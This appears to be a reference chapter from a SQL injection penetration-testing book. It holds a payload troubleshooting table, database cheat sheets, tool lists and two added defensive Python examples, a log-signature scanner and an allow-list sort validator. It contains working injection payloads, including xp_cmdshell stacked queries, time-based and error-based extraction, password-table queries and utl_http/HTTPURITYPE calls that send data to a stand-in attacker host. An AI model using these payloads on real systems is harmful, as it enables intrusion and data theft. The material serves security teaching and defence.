Troubleshooting SQL Injection Attacks (Chapter 11: References, p. 523)

Table 11.24 Troubleshooting SQL Injection Reference

Challenge: Performing a UNION SELECT attack where the original query is retrieving a column of type image.
Error Message: "Image is incompatible with int" / "The image data type cannot be selected as DISTINCT because it is not comparable."
Solution: Change your UNION SELECT statement to read UNION ALL SELECT. This resolves the problem with UNION SELECT attempting to perform a compare operation against an image data type. For example:
    UNION ALL SELECT null, null, null

Challenge: Injecting into an ORDER BY clause. Your injected data is being placed to the right-hand side of an ORDER BY clause, so many of the usual tricks such as UNION SELECT will be unsuccessful. In this example, the following SQL query is being executed, where attackers_data is your injection point:
    SELECT * FROM products ORDER BY attackers_data DESC
Solution:
Microsoft SQL Server. Microsoft SQL Server supports stacked queries, using the semicolon character (;) to begin each new query. A variety of attacks, such as time-delay-based data retrieval and the execution of extended stored procedures, can be conducted in this way:
    ORDER BY 1; EXEC master..xp_cmdshell 'cmd'
Microsoft SQL Server can also be exploited to return query result data via error messages. When injecting into an ORDER BY clause, the following syntax can be used:
    ORDER BY (1/(@@version)); -- return the version
    ORDER BY 1/(SELECT TOP 1 name FROM sysobjects WHERE xtype='U'); -- return a name from sysobjects
MySQL Server. Time-delay-based blind SQL injection techniques can be used within an ORDER BY clause. The following example will trigger a time delay if the current user is root@localhost:
    ORDER BY (IF((SELECT user()='root@localhost'),sleep(2),1));
Oracle. The utl_http package can be used to establish outbound HTTP connections over any Transmission Control Protocol (TCP) port of the attacker's choosing. The following ORDER BY clause establishes an HTTP connection over port 1000 to the host attacker; the HTTP request contains the Oracle version banner within the request path:
    ORDER BY utl_http.request('http://attacker:1000/'||(SELECT banner FROM v$version WHERE rownum=1))
The following ORDER BY clause will raise an error containing the Oracle version banner:
    ORDER BY utl_inaddr.get_host_name((SELECT banner FROM v$version WHERE rownum=1))
PostgreSQL. PostgreSQL can be exploited to return query result data via error messages. When injecting into an ORDER BY clause, the following syntax can be used:
    ORDER BY (SELECT CAST((SELECT version())::text AS Numeric))

Challenge: Utl_http does not work because the public privilege was removed.
Error Message: ORA-00904 invalid identifier
Solution: Many Oracle security guides recommend that the public privilege be removed from the utl_http package. However, many overlook the fact that the object type HTTPURITYPE can be used to achieve the same aim and is also accessible to public:
    SELECT HTTPURITYPE('http://attacker:1000/'||(SELECT banner FROM v$version WHERE rownum=1)).getclob() FROM dual

Challenge: Utl_inaddr does not work. There could be various reasons, such as access control lists (ACLs) in Version 11, privileges having been revoked, or Java not being installed.
Error Message: ORA-00904 invalid identifier; ORA-24247 network access denied by access control list (ACL) (11g); ORA-29540 oracle/plsql/net/InternetAddress
Solution: Use a different function where you can control the content of the error message. Here is a small list of candidates, depending on the database version and its installed components:
    ORDER BY ORDSYS.ORD_DICOM.GETMAPPINGXPATH((SELECT banner FROM v$version WHERE rownum=1),null,null)
    ORDER BY SYS.DBMS_AW_XML.READAWMETADATA((SELECT banner FROM v$version WHERE rownum=1),null)
    ORDER BY CTXSYS.DRITHSX.SN((SELECT banner FROM v$version WHERE rownum=1),user)
    ORDER BY CTXSYS.CTX_REPORT.TOKEN_TYPE(user,(SELECT banner FROM v$version WHERE rownum=1))

Challenge: You receive an "illegal mix of collations" message when performing a UNION SELECT attack against a MySQL database.
Error Message: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
Solution: This error can be overcome using the CAST function. For example:
    UNION SELECT user(),null,null;
becomes:
    UNION SELECT CAST(user() AS char),null,null;

Challenge: You receive a "collation conflict" message when performing a UNION SELECT attack against a Microsoft SQL Server database.
Error Message: Cannot resolve collation conflict for column 2 in SELECT statement.
Solution: One way to overcome this error is to read the Collation property from the database and then use it within the query. In the following example, we are performing a UNION ALL SELECT query to retrieve the name column from the sysobjects table.
Step 1: Retrieve the collation value:
    UNION ALL SELECT SERVERPROPERTY('Collation'),null FROM sysobjects
In this example, the Collation property is set to SQL_Latin1_General_CP1_CI_AS.
Step 2: Implement the collation value within the UNION SELECT:
    UNION ALL SELECT 1,Name collate SQL_Latin1_General_CP1_CI_AS,null FROM sysobjects

SQL INJECTION ON OTHER PLATFORMS
This book focuses on the four most popular databases: Microsoft SQL Server, MySQL, Oracle, and PostgreSQL. This section is intended to provide a quick reference for other, less common platforms, such as DB2, Informix, and Ingres.
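Before moving on to the other platforms, here is an added example, not code from the book, that takes the defender's view of the troubleshooting table above: it scans web server access-log lines for the ORDER BY-clause and out-of-band payload shapes the table lists (stacked xp_ calls, the 1/(...) division trick, sleep(), utl_http/HTTPURITYPE, the error-controlled Oracle functions, and the PostgreSQL CAST-to-numeric). The log lines, the sort parameter name and the signature labels are constructed for this example; the regular expressions are one reading of the table's payloads, not a complete rule set.

```python
"""Added example: flag the ORDER BY-clause and out-of-band payload patterns from
Table 11.24 in web server access logs. The log lines, parameter name and
signature labels are constructed for illustration, not taken from the book."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# One signature per technique in the troubleshooting table. Patterns are applied
# to the decoded parameter value only; the application supplies "ORDER BY", so
# that keyword never appears in the request itself.
SIGNATURES = [
    ("MSSQL stacked query calling an extended stored procedure",
     re.compile(r";\s*exec\b.*\bxp_\w+", re.I)),
    ("MSSQL error-based ORDER BY: integer divided by a string result",
     re.compile(r"\b1\s*/\s*\(\s*(@@version|select\b)", re.I)),
    ("MySQL time-based ORDER BY via sleep()",
     re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I)),
    ("Oracle outbound HTTP request (utl_http or HTTPURITYPE)",
     re.compile(r"\b(utl_http\.request|httpuritype)\s*\(", re.I)),
    ("Oracle error-controlled function call",
     re.compile(r"\b(utl_inaddr\.get_host_name|ordsys\.ord_dicom\.getmappingxpath|"
                r"sys\.dbms_aw_xml\.readawmetadata|ctxsys\.drithsx\.sn|"
                r"ctxsys\.ctx_report\.token_type)\s*\(", re.I)),
    ("PostgreSQL error-based cast of version() to numeric",
     re.compile(r"\bcast\s*\(.*\bversion\s*\(\s*\).*\bas\s+numeric\b", re.I)),
]

# The request line inside a common/combined log format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log: line 1 is a normal sort; the rest carry payloads from
# the table, URL-encoded as a browser or proxy would send them. Line 8 is
# double-encoded, which the canonicalization step below unwinds.
LOG_LINES = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /products?sort=price HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /products?sort=1%3B+EXEC+master..xp_cmdshell+%27cmd%27 HTTP/1.1" 500 312',
    '10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /products?sort=%281%2F%28%40%40version%29%29 HTTP/1.1" 500 280',
    '10.0.0.9 - - [10/Oct/2023:13:55:43 +0000] "GET /products?sort=%28IF%28%28SELECT+user%28%29%3D%27root%40localhost%27%29%2Csleep%282%29%2C1%29%29 HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2023:13:55:45 +0000] "GET /products?sort=utl_http.request%28%27http%3A%2F%2Fattacker%3A1000%2F%27%7C%7C%28SELECT+banner+FROM+v%24version+WHERE+rownum%3D1%29%29 HTTP/1.1" 500 300',
    '10.0.0.9 - - [10/Oct/2023:13:55:46 +0000] "GET /products?sort=utl_inaddr.get_host_name%28%28select+banner+from+v%24version+where+rownum%3D1%29%29 HTTP/1.1" 500 300',
    '10.0.0.9 - - [10/Oct/2023:13:55:47 +0000] "GET /products?sort=%28SELECT+CAST%28%28SELECT+version%28%29%29%3A%3Atext+as+Numeric%29%29 HTTP/1.1" 500 300',
    '10.0.0.9 - - [10/Oct/2023:13:55:49 +0000] "GET /products?sort=sleep%25282%2529 HTTP/1.1" 200 512',
]


def canonicalize(value, max_rounds=3):
    """Undo repeated percent-encoding so a double-encoded payload is compared
    in the same form the database would eventually receive."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value):
    """Return the label of every signature that matches one parameter value."""
    text = canonicalize(value)
    return [label for label, pattern in SIGNATURES if pattern.search(text)]


def scan_log(lines):
    """Scan access-log lines; return one finding per suspicious parameter."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            labels = classify(value)
            if labels:
                findings.append({"line": number, "param": name, "labels": labels})
    return findings


if __name__ == "__main__":
    for finding in scan_log(LOG_LINES):
        print(f"line {finding['line']}: {finding['param']} -> {', '.join(finding['labels'])}")
```

Each finding names the platform the payload targets, so an alert can be checked against the application's actual back end: an Oracle utl_http probe against a MySQL application is reconnaissance, while a sleep() probe that coincides with a two-second response time in the same log line is a confirmed injection point that needs the ORDER BY parameter fixed at the application.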
DB2 Cheat Sheet
The DB2 database server from IBM was historically an uncommon database platform to find integrated with a Web application; however, the Linux, Unix and Windows edition (DB2 LUW) is becoming increasingly popular. As such, if you do encounter a SQL injection flaw within a DB2-based application, this section will help you exploit it.

Enumerating Database Configuration Information and Schema
Table 11.25 lists SQL statements used to extract key configuration information. Table 11.26 lists the SQL statements used to enumerate schema information.

Table 11.25 Extracting DB2 Database Configuration Information
Version: SELECT versionnumber, version_timestamp FROM sysibm.sysversions;
Current user: SELECT user FROM sysibm.sysdummy1;
    SELECT session_user FROM sysibm.sysdummy1;
    SELECT system_user FROM sysibm.sysdummy1;
List users: SELECT grantee FROM syscat.dbauth;
Current user privileges: SELECT * FROM syscat.dbauth WHERE grantee = user;
    SELECT * FROM syscat.tabauth WHERE grantee = user;
    SELECT * FROM syscat.tabauth;

Table 11.26 Extracting DB2 Database Schema
Current database: SELECT current server FROM sysibm.sysdummy1;
List databases: SELECT schemaname FROM syscat.schemata;
List tables: SELECT name FROM sysibm.systables;
List columns: SELECT name, tbname, coltype FROM sysibm.syscolumns;

Blind SQL Injection Functions: DB2
Table 11.27 lists functions that are useful when performing blind SQL injection attacks.

Table 11.27 Blind SQL Injection Functions (DB2)
String length: LENGTH()
Extract substring from a given string: SELECT SUBSTRING(string, offset, length) FROM sysibm.sysdummy1;
String ('ABC') representation with no single quotes: SELECT CHR(65)||CHR(66)||CHR(67);

Informix Cheat Sheet
The Informix database server is distributed by IBM and is not commonly encountered when compared to other database platforms. The following reference should help if you encounter an Informix server in the wild.

Enumerating Database Configuration Information and Schema
Table 11.28 lists SQL statements used to extract key configuration information. Table 11.29 lists the SQL statements used to enumerate schema information.

Table 11.28 Extracting Informix Database Configuration Information
Version: SELECT DBINFO('version', 'full') FROM systables WHERE tabid = 1;
Current user: SELECT USER FROM systables WHERE tabid = 1;
List users: SELECT usertype, username, password FROM sysusers;
Current user privileges: SELECT tabname, tabauth, grantor, grantee FROM systabauth JOIN systables ON systables.tabid = systabauth.tabid;
Database server host name: SELECT DBINFO('dbhostname') FROM systables WHERE tabid = 1;

Table 11.29 Extracting Informix Database Schema
Current database: SELECT DBSERVERNAME FROM systables WHERE tabid = 1;
List databases: SELECT name, owner FROM sysdatabases;
List tables: SELECT tabname FROM systables;
    SELECT tabname, viewtext FROM sysviews JOIN systables ON systables.tabid = sysviews.tabid;
List columns: SELECT tabname, colname, coltype FROM syscolumns JOIN systables ON syscolumns.tabid = systables.tabid;

Blind SQL Injection Functions: Informix
Table 11.30 lists functions that are useful when performing blind SQL injection attacks.

Table 11.30 Blind SQL Injection Functions (Informix)
String length: LENGTH()
Extract substring from a given string: SELECT SUBSTRING('ABCD' FROM 4 FOR 1) FROM systables WHERE tabid = 1; -- returns 'D'
String ('ABC') representation with no single quotes: SELECT CHR(65)||CHR(66)||CHR(67) FROM systables WHERE tabid = 1;

Ingres Cheat Sheet
The Ingres database is an open source database available for all major operating systems. Ingres is one of the least popular databases to find integrated with a Web application. For further information and Ingres tutorials see http://ariel.its.unimelb.edu.au/~yuan/ingres.html.

Enumerating Database Configuration Information and Schema
Table 11.31 lists SQL statements used to extract key configuration information. Table 11.32 lists the SQL statements used to enumerate schema information.

Table 11.31 Extracting Ingres Database Configuration Information
Version: SELECT dbmsinfo('_version');
Current user: SELECT dbmsinfo('system_user');
    SELECT dbmsinfo('session_user');
List users: SELECT name, password FROM iiuser;
Current user privileges: SELECT dbmsinfo('select_syscat');
    SELECT dbmsinfo('db_privileges');
    SELECT dbmsinfo('current_priv_mask');
    SELECT dbmsinfo('db_admin');
    SELECT dbmsinfo('security_priv');
    SELECT dbmsinfo('create_table');
    SELECT dbmsinfo('create_procedure');

Table 11.32 Extracting Ingres Database Schema
Current database: SELECT dbmsinfo('database');
List tables: SELECT relid, relowner, relloc FROM iirelation WHERE relowner != '$ingres';
List columns: SELECT column_name, column_datatype, table_name, table_owner FROM iicolumns;

Blind SQL Injection Functions: Ingres
Table 11.33 lists functions that are useful when performing blind SQL injection attacks.

Table 11.33 Blind SQL Injection Functions (Ingres)
String length: LENGTH()
Extract substring from a given string: SELECT substr(string, offset, length);
String ('ABC') representation with no single quotes: SELECT chr(65)||chr(66)||chr(67);

Sybase Cheat Sheet
Sybase and Microsoft SQL Server share a common heritage, and as such many of the approaches used with Microsoft SQL Server will also work with Sybase, often with little or no change to the syntax of the commands.

Enumerating Database Configuration Information and Schema
Table 11.34 lists SQL statements used to extract key configuration information. Table 11.35 lists the SQL statements used to enumerate schema information.

Table 11.34 Extracting Sybase Database Configuration Information
Version: SELECT @@version;
Current user: SELECT username();
    SELECT suser_name();
    SELECT user;
List users: SELECT name FROM master..syslogins;
Current user privileges: SELECT show_role();
    EXEC sp_helprotect <user>;

Table 11.35 Extracting Sybase Database Schema
Current database: SELECT db_name();
List databases: SELECT name FROM master..sysdatabases;
List tables: Tables within the current database:
    SELECT name FROM sysobjects WHERE type='U';
    SELECT name FROM sysobjects WHERE type='V'; -- Views
  Tables within the master database:
    SELECT name FROM master..sysobjects WHERE type='U';
    SELECT name FROM master..sysobjects WHERE type='V';
List columns: Column names for the tblUsers table within the current database:
    SELECT name FROM syscolumns WHERE id=object_id('tblUsers');
  Column names for the tblUsers table within the admin database:
    SELECT name FROM admin..syscolumns WHERE id=object_id('admin..tblUsers');

Blind SQL Injection Functions: Sybase
Table 11.36 lists functions that are useful when performing blind SQL injection attacks.

Table 11.36 Blind SQL Injection Functions (Sybase)
String length: LEN()
Extract substring from a given string: SUBSTRING(string, offset, length)
String ('ABC') representation with no single quotes: SELECT char(65) + char(66) + char(67);

Microsoft Access
Microsoft Access databases do not scale well with enterprise applications, and therefore are usually encountered only when the application has minimal database requirements. Brett Moore of insomniasec.com has published an excellent paper on SQL injection with Microsoft Access, which you can find here:
• www.insomniasec.com/publications/Access-Through-Access.pdf
RESOURCES
This section provides a list of links to further reading materials and tools to assist you in discovering, exploiting, and preventing SQL injection vulnerabilities.

SQL Injection White Papers
• "Advanced SQL Injection" by Victor Chapela: www.owasp.org/index.php/Image:Advanced_SQL_Injection.ppt
• "Advanced SQL Injection in SQL Server Applications" by Chris Anley: www.ngssoftware.com/papers/advanced_sql_injection.pdf
• "Buffer Truncation Abuse in .NET and Microsoft SQL Server" by Gary O'Leary-Steele: http://scanner.sec-1.com/resources/bta.pdf
• "Access through Access" by Brett Moore: www.insomniasec.com/publications/Access-Through-Access.pdf
• "Time-Based Blind SQL Injection with Heavy Queries" by Chema Alonso: http://technet.microsoft.com/en-us/library/cc512676.aspx

SQL Injection Cheat Sheets
• PentestMonkey.com SQL injection cheat sheets for Oracle, Microsoft SQL Server, MySQL, PostgreSQL, Ingres, DB2, and Informix: http://pentestmonkey.net/cheat-sheets/
• Michaeldaw.org SQL injection cheat sheets for Sybase, MySQL, Oracle, PostgreSQL, DB2, and Ingres: http://michaeldaw.org/sql-injection-cheat-sheet/
• Ferruh Mavituna cheat sheets for MySQL, SQL Server, PostgreSQL, and Oracle: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
• Ferruh Mavituna cheat sheets for Oracle: http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/

SQL Injection Exploit Tools
• Absinthe is a Windows GUI-based exploit tool that supports Microsoft SQL Server, Oracle, PostgreSQL, and Sybase using both blind and error-based SQL injection: www.0x90.org/releases/absinthe/
• SQLBrute is a time- and error-based blind SQL injection tool that supports Microsoft SQL Server and Oracle: https://github.com/GDSSecurity/SQLBrute
• Bobcat is a Windows GUI-based tool that supports Microsoft SQL Server exploitation: http://web.mac.com/nmonkee/pub/bobcat.html
• BSQL Hacker is a relatively new player in the SQL injection exploit world. The tool is a Windows-based GUI application that supports Microsoft SQL Server, Oracle, and MySQL. BSQL Hacker supports blind and error-based SQL injection techniques: http://labs.portcullis.co.uk/application/bsql-hacker/
• SQLMap is considered by many to be the best SQL injection exploit tool currently available: http://sqlmap.sourceforge.net/
• Sqlninja is a Microsoft SQL injection tool focused on gaining code execution and written in Perl: http://sqlninja.sourceforge.net/
• Squeeza was released as part of a BlackHat presentation. It focuses on alternative communication channels. Squeeza supports Microsoft SQL Server: www.sensepost.com/research/squeeza/

Password Cracking Tools
• Cain & Abel: www.oxid.it
• Worauthbf: www.soonerorlater.hu/index.khtml?article_id=513
• Checkpwd: www.red-database-security.com/software/checkpwd.html
• John the Ripper: www.openwall.com/john/

SOLUTIONS FAST TRACK

Structured Query Language (SQL) Primer
• SQL comprises a feature-rich set of statements, operators, and clauses designed to interact with a database server. The most common SQL statements are SELECT, INSERT, UPDATE, DELETE, and DROP. The majority of SQL injection vulnerabilities occur when user-supplied data is included with the WHERE clause portion of a SELECT statement.
• The UPDATE and DELETE statements rely on a WHERE clause to determine which records are modified or deleted. When injecting SQL into either an UPDATE or a DELETE statement it is important to understand how your input could affect the database. Avoid injecting OR 1=1 or any other condition that returns true into either of these statements.
• The UNION operator is used to combine the results of two or more SELECT statements. UNION SELECT is frequently used to exploit SQL injection vulnerabilities.

SQL Injection Quick Reference
• Identifying the database platform is an important step when attempting to exploit a SQL injection vulnerability. Triggering a measurable time delay is a reliable method of accurately identifying the database platform.
• When exploiting SQL injection vulnerabilities you are often restricted to returning one column from one row at a time. You can overcome this restriction by concatenating the results from multiple columns and rows into a single string.

Bypassing Input Validation Filters
• You can often circumvent input validation filters that are designed to handle the single-quote character (') by representing string values using character functions. For example, char(65,66,67) is equivalent to 'ABC' on Microsoft SQL Server.
• HTTP encoding variants such as Unicode and Overlong UTF-8 can sometimes be used to bypass input validation filters.
• Input validation filters that rely on rejecting known bad data, often referred to as blacklisting, are frequently flawed.

Troubleshooting SQL Injection Attacks
• When exploiting a SQL injection flaw using UNION SELECT you may encounter type clash errors when image data type columns are included within the original query. To overcome this common obstacle use UNION ALL SELECT.
• Microsoft SQL Server supports stacked queries using the semicolon character to begin each new query.
• The Oracle Database Server includes the utl_http package that you can use to establish outbound HTTP connections from the database server host. It is possible to abuse this package to extract database data via HTTP connections to any TCP port.

SQL Injection on Other Platforms
• The most commonly encountered database platforms are Microsoft SQL Server, Oracle, and MySQL. This chapter included a SQL injection cheat sheet for DB2, Informix, and Ingres databases.
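The Fast Track points on input validation filters (character functions and overlong UTF-8 defeating quote blacklists) and the ORDER BY troubleshooting row together describe the defensive corner this chapter leaves to the reader: an ORDER BY column cannot be passed as a bound parameter, so the value has to be canonicalized and then matched against an allow-list. The following is an added example written for this page, not code from the book; the column names in ALLOWED_SORT_COLUMNS, the function names and the sample inputs are constructed for illustration.

```python
"""Added example: canonicalize a request parameter before validating it, and use
an allow-list rather than a deny-list for an ORDER BY column. The column names,
function names and sample inputs are constructed for this example."""
from urllib.parse import unquote_to_bytes

# Constructed allow-list: the only columns a caller may sort by.
ALLOWED_SORT_COLUMNS = {"price", "name", "created_at"}


def decode_strict(raw):
    """Percent-decode to bytes, then require well-formed UTF-8.

    Python's strict decoder rejects overlong sequences, for example C0 A7, an
    overlong encoding of the apostrophe. A lenient decoder that accepts such
    forms maps them to the same code point as the one-byte quote, which is how
    a filter applied to the raw text is bypassed. Rejecting the byte string
    outright means the validation step never sees an ambiguous value."""
    try:
        return unquote_to_bytes(raw).decode("utf-8")
    except UnicodeDecodeError:
        return None


def deny_list_filter(text):
    """The kind of blacklist the Fast Track warns about: it looks for the quote
    character and the comment marker, so a value built from char(65,66,67) or
    carrying an encoded quote passes it untouched."""
    return "'" not in text and "--" not in text


def validate_sort(raw):
    """Allow-list validation for a sort parameter.

    Returns (column, direction) or None. The value is decoded strictly, split
    into at most a column and a direction, and each part must match a known
    value exactly; anything else, including a trailing stacked statement or a
    function call, is rejected without needing a list of bad tokens."""
    text = decode_strict(raw)
    if text is None:
        return None
    parts = text.strip().split()
    if not 1 <= len(parts) <= 2:
        return None
    column = parts[0].lower()
    direction = parts[1].upper() if len(parts) == 2 else "ASC"
    if column not in ALLOWED_SORT_COLUMNS or direction not in ("ASC", "DESC"):
        return None
    return column, direction


def build_order_by(raw):
    """Assemble the ORDER BY fragment from validated values only; the raw
    request string never reaches the SQL text."""
    result = validate_sort(raw)
    if result is None:
        raise ValueError("sort parameter rejected")
    column, direction = result
    return f"ORDER BY {column} {direction}"


if __name__ == "__main__":
    # Constructed inputs: two legitimate sorts, a character-function value, an
    # overlong-encoded quote and a stacked-query attempt.
    for sample in ("price", "name%20DESC", "char(65,66,67)", "%C0%A7",
                   "price%3B%20EXEC%20master..xp_cmdshell"):
        decoded = decode_strict(sample)
        passes_blacklist = decoded is not None and deny_list_filter(decoded)
        print(f"{sample!r}: blacklist passes={passes_blacklist}, allow-list={validate_sort(sample)}")
```

The deny-list passes both char(65,66,67) and the stacked-statement value, because neither contains the characters it is looking for; the allow-list rejects them because they are not a known column. The overlong sequence is refused one step earlier, in decode_strict, which is the point: canonicalization has to happen before any comparison, and the comparison should be against what is permitted, not what is forbidden.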
Index tasks, 76 Zed Attack Proxy, 83–85 A automated techniques absinthe abstract syntax tree (AST), 127 Android application code configuration tab, 277 GPL tool, 276 Content-Providers, 111–112, 115, 116 injectable parameter, 277–278 parameterized statements, 378 BSQL hacker SQLiteDatabase, 112–114 extracting database login, 280 SQLiteQueryBuilder, 112–114 features, 278 sqlmap, 112–114 request and injection tab, 279 WebContentResolver, 112 selecting database plugin, 280 application program interfaces (APIs), 371 URL textbox, 279 Aspect-oriented programming (AOP), 424 SQLBrute Asprox Botnet, 73–74 FALSE statement, 281 AST. See abstract syntax tree (AST) python interpreter, 281 automated source code review sqlninja abstract syntax tree (AST), 127 extraction of username, 284 AppCodeScan, 130 SQL server installations, 283 AppScan Source Edition, 135 uploading DNS helper, 284 CodePro AnalytiX, 132 squeeza CodeSecure, 135 DNS channel, 284–286 command-line utilities, 126–127 GET and POST parameters, 286 control flow graph (CFG), 127 Klocwork Solo, 135–136 B lexical analysis, 127 Microsoft analyzer, 131 BCP. 
See bulk copy program (BCP) Microsoft code analysis tool .NET blind SQL injection techniques (CAT.NET), 131–132 channels, 249 mysql_query( ) function, 127 inference techniques OWASP LAPSE+ project, 130–131 PHP scripts, vulnerabilities in, 132 ASCII( ) function, 244 Pixy, 129–130 bit string, 248 RIPS, 132 bitwise operations, 247 source code analyzers (SCAs), extracting data method, 243–244 one bit information, 239 133–134 SQL Server database, 240 static analysis, 134–135 status parameter, 242 Teachable Static Analysis Workbench SUBSTRING( ) function, 242–243 T-SQL, 247 (TeSA), 132–133 integer value, 248 yet another source code analyzer Bobcat, 225–226 BSQL (YASCA), 129 active session, 227 automated SQL injection discovery databases, 226 remote database, 228 database error, 76 built-in stored procedures, 371 GET and POST requests, 76 bulk copy program (BCP), 311 HP Scrawlr, 80–82 bypassing input validation filters HP WebInspect HTTP encoding, 521, 522 quote filters, 520–521 authentication mechanisms, 77 Hewlett-Packard, 77 testing string, 78 IBM Rational AppScan, 79–80 Paros Proxy, 83–85 SQLiX, 82–83 535
536 Index C using abstraction layers, 400–401 using stored procedures, 399–400 C# applications domain driven security (DDS) coding behavior recognition, 98–99 concept, 366–368 dangerous functions, 103–104 login function, 366 data process, 110–111 encoding output, database, 387–396 Java database connectivity (JDBC), 372 canonicalization approaches NoSQL injection, 395–396 ASCII equivalents, 397 parameterized statements framework, 398 .NET (C#), 373–376 input normalization, 397 advantage, 371 input validity, 398 dynamic string building, 371 normalization process, 397 HTML5 browser storage, 378–379 working with Unicode input, 397–399 Java, 372–373 mobile apps, 377–378 CAT.NET. See Microsoft code analysis tool .NET PHP, 376–377 (CAT.NET) PL/SQL, 377 statements, 372 channels secure coding, 365 database connections validating input OPENROWSET command, 267, 268 .NET, 386 PL/pgSQL functions, 269 blacklisting, 383–384 transmission control protocol (TCP), 267 HTML5, 387 DNS exfiltration Java, 384–386 advantages, 269 mobile apps, 387 GET_HOST function, 269–270 PHP, 386–387 stored procedure, 271, 272 whitelisting, 379–383 universal naming convention (UNC), 271 COLUMN privileges, 185–187 VARBINARY parameter, 271–272 common language runtime (CLR), 301–303 xp_cmdshell procedure, 270 Common Weakness Scoring System (CWSS), 9 zone attacker.com, 273 confirming and recovering SQL injection E-mail exfiltration, 273 HTTP exfiltration attack actions performed by attacker HTTPURITYPE package, 273–274 during incident, 474–475 Oracle function, 274–275 data involved assessment, 473–474 ORDER BY clause, 275 dynamic payloads, 479–481 ICMP exfiltration, 276 incident containment, 472–473 investigations client-side SQL injection digital artifacts, 446–472 attacking client-side databases, 356–358 forensically sound practices, 444–446 local database, 355–356 notification of appropriate individuals, 474 payload of attack, 476–477 CLR. See common language runtime (CLR) static payloads, 477–479 CMS. 
See content management system (CMS) confirming and terminating SQL injection code-level defenses BENCHMARK function, 75 comments application program interfaces (APIs), 371 back-end server, 70 canonicalization approaches database concatenation operators, 69, 70 exploitation, 68 ASCII equivalents, 397 multiline comments, 68, 69 framework, 398 testing string, 70 input normalization, 397 database comment syntax, 65–67 input validity, 398 DBMS_LOCK.SLEEP( ) function, 76 normalization process, 397 working with Unicode input, 397–399 design techniques avoiding obvious object names, 403–404 database honeypots, 404 handling sensitive data, 401–403 secure development resources, 404–405
Index 537 executing multiple statement PostgreSQL delays Asprox Botnet, 73–74 binary search inference exploits, 254 denial of service (DoS) attacks, 73 bit-by-bit inference exploits, 254 GET parameter, 72 pg_sleep( ) function, 252–253 GROUP BY technique, 71 PL/pgSQL, 253 server-side cursors, 70 testing string, 73 SQL Server delays UNION statements, 71–72 binary search inference exploits, 256 UPDATE statement, 71 bit-by-bit inference exploits, 256–257 WHERE clause, 72 WAITFOR DELAY keyword, 255 inline function database security numeric values, 63–65 application data, locking down strings, 59–63 audit trail maintenance, 428–431 least-privileged database login, 426 numbers and strings, 58–59 oracle error triggers, 429–431 statement, 65 PUBLIC permissions revoking, 427 time delays, 74–76 segregated database logins, 426–427 trial-and-error process, 58 stored procedures, 427 content management system (CMS) strong cryptography, 427–428 CMSUsers table, 8 database server, locking down login.php script, 7–8 Ad Hoc query restriction, 432 PHP script, 3, 8 least-privileged operating system Web application, 7 account, 433 CREATE PROCEDURE privilege patched database server software, cursor injection, 202–203 433–434 SYS.KUPP$PROC, 203 SQL server/Oracle database server weak permissions, 203–204 versions, 433 cross-site scripting (XSS), 77 strengthen controls, 432–433 system objects, 431–432 D database stored procedures, 371 database administrators (DBAs), 290, 359 DB2 cheat sheet database-driven Web applications blind SQL injection functions, 526, 527 three-tier system, 2, 3 database configuration information and database execution plan schema, 526 access execution plans, 458–461 DBAs. See database administrators (DBAs) limitations, 461–462 DBMS_LOCK.SLEEP( ) function, 76 Microsoft SQL Server, 458–459 DDS. 
See domain driven security (DDS) MySQL, 459–460 deployment considerations observe within cached execution plans, network access control configuration, 439 455–458 unnecessary information leakage Oracle, 459 PostgreSQL, 460–461 configuration techniques, 435 database management system (DBMS), 290 DNS lookups, dummy host names, 436–437 database queries empty default web site, 436 inference methods, 249 HTML noindex Meta Tag, 437 MySQL delays search engine hacking, limit discovery, BENCHMARK( ) function, 250–251 437–438 binary search inference exploits, 251–252 suppress error messages, 434–436 bit-by-bit inference exploits, 252 Web Services Description Language SLEEP( ) function, 250–251 Oracle delays (WSDL) information, 438 alonso, 257 wildcard SSL certificates, 437 DBMS_LOCK package, 257 web and database servers, separate hosts, 439 web server logs, verbosity, 438–439
538 Index design techniques E abstraction layers, 399–400 avoiding obvious object names, 403–404 e-commerce application, 2, 6 database honeypots, 404 E-mail handling sensitive data database, 401–403 exfiltration, 273 incident response, 402 Microsoft SQL Server secure development resources notable projects, 405 database Mail account, 213–214 red-database-security, 405 e-mailing subsystems, 211–212 stored procedures procedure, 213–214 access control, 399 sp_send_dbmail, 213 web application, 400 Oracle, 214–215 enterprise security application program interface digital artifacts database execution plan (ESAPI), 385 access execution plans, 458–461 exploit techniques limitations, 461–462 Microsoft SQL Server, 458–459 arbitrary data, 167, 168 MySQL, 459–460 automated exploitation observe within cached execution plans, 455–458 Bobcat, 225–226 Oracle, 459 BSQL, 226–227 PostgreSQL, 460–461 other tools, 227–228 database object timestamps sqlmap, 224–225 Microsoft SQL Server, 469 black-box attack approach, 140 MySQL, 470–471 conditional statements Oracle, 469–470 content-based approach, 165 PostgreSQL, 471–472 database server technologies, 159 transaction log error-based approach, 163–165 analysis, 463–468 methods, 158–159 Microsoft SQL Server, 463–465 time-based approach, 159–163 MySQL, 466–468 database schema enumeration Oracle, 465–466 MySQL, 178–183 PostgreSQL, 468 Oracle, 184–188 Web server log files, 446–452 PostgreSQL, 183–184 SQL Server, 175–178 DNS. 
